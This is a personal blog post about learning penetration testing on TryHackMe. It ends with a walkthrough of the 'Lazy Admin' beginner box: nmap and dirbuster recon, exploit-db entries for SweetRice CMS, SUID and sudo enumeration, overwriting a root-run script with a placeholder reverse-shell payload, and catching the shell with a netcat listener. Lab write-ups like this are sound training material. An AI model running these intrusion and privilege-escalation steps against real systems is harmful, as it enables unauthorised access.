I have been grinding cybersecurity learnings at the start of 2026 because I am bored and want to learn more about the ecosystem. To do this, I signed up for TryHackMe which is a platform that has both courses and challenges for learning things from basics of networking all the way to privilege escalation on Linux or Windows.
I joined the "Jr. Penetration Tester" learning path and completed it in about 30 days. I would recommend this to any web/app developer. It gives you new ways to think about your application (how it can be abused) while also deepening your knowledge on infrastructure and things you may not typically deal with if you are not part of a small team or dev-ops (linux users, file permissions, etc).
You do not know how much you do not know. The topics in cybersecurity are so broad. You have to understand how operating systems work, web applications, details of an applications plugin eco-system, etc. It is an all-encompassing knowledge-base that you need to keep up with in order to be effective (or quickly learn).
Getting hands-on with this information is a great way to challenge your brain to think out of the box. You find ways to use the tools and knowledge in different unique situations. I have found that it feels more like an art than a science when poking around on a target application/server.
A tool called Metasploit makes it trivial to setup an entire chain of actions from recon and access to exploiting targets by their OS and services. Burp Suite provides a lot of the tools you would need in an interface to reverse-engineer and attack web applications. Both of these are free.
The tools are there, but without a fundamental understanding of the basics you do not have a chance at being effective. For example, some exploits can be quite complex and you should understand what is happening under the hood before you run them (or craft them). Otherwise, you could wreck the target machine or break rules for the pentest (rate limits, scope, etc).
An entry level challenge on THM might require the usage of the following tools:
- nmap
- dirbuster
- johntheripper
- netcat
- find
- http.server python module
The exploit eco-system is interesting and relatively easy to dive into. As I went through the learnings and challenges I found myself constantly reaching for the following resources:
- exploit[dash]db[dot]com
- searchsploit (simple way to use payloads from exploit db)
- msfvenom or msfconsole to create/search payloads
- github (search CVE)
- NIST vuln db
For example, you search something like "SweetRice" in exploit db, and it will list verified exploits for that application framework (versions are very important). Again, you might have to tweak the usage of the exploit for your unique situation - but it can give you the shape of your attack vector.
I feel like I am using a different part of the brain when going through some of these challenges on THM. They require a systematic approach with an open mind. I enjoy digging through information and learning as much as I possibly can about these systems that lay beneath the naked eye.
Onward!
Here is how I solved a recent beginners challenge on THM (Lazy Admin box).
# 1. discover services
nmap -sS <target>
# 2. found web applications, discover routes
dirbuster <target> --wordlist=<some word list>
# 3. recon routes manually
# 4. discover application is SweetRice CMS, find version
# 5. research exploit db for app exploits
# 6. discover EID: 40718 (db backup disclosure), download sql backup file
# 7. Login as admin
# 8. exploit EID: 40700, add a malicious ad that executes PHP code to execute commands on the server
# 9. recon of server might use these commands
find / -type f -perm /4000 2>/dev/null (sbit)
find / -type d -writable 2>/dev/null
ls -la /home
sudo -l
# FLAG FOUND: /home/itguy/flag.txt
# 10. you find that you can run /usr/bin/perl as root, and that another user has a script that calls /etc/copy.sh which you can edit
# 11. Via EID: 40700 you run this command to edit /etc/copy.sh
echo "<reverse shell payload>" > /etc/copy.sh
# 12. On attack machine set up to catch shell
nc -lnvp 9000
# 13. execute /etc/copy.sh on target machine with perl sudo access
sudo /usr/bin/perl /home/itguy/backup.pl
# 14. you now have a root shell caught by your attack machine:
whoami (root)
find / -name root.txt 2>/dev/null
# FLAG FOUND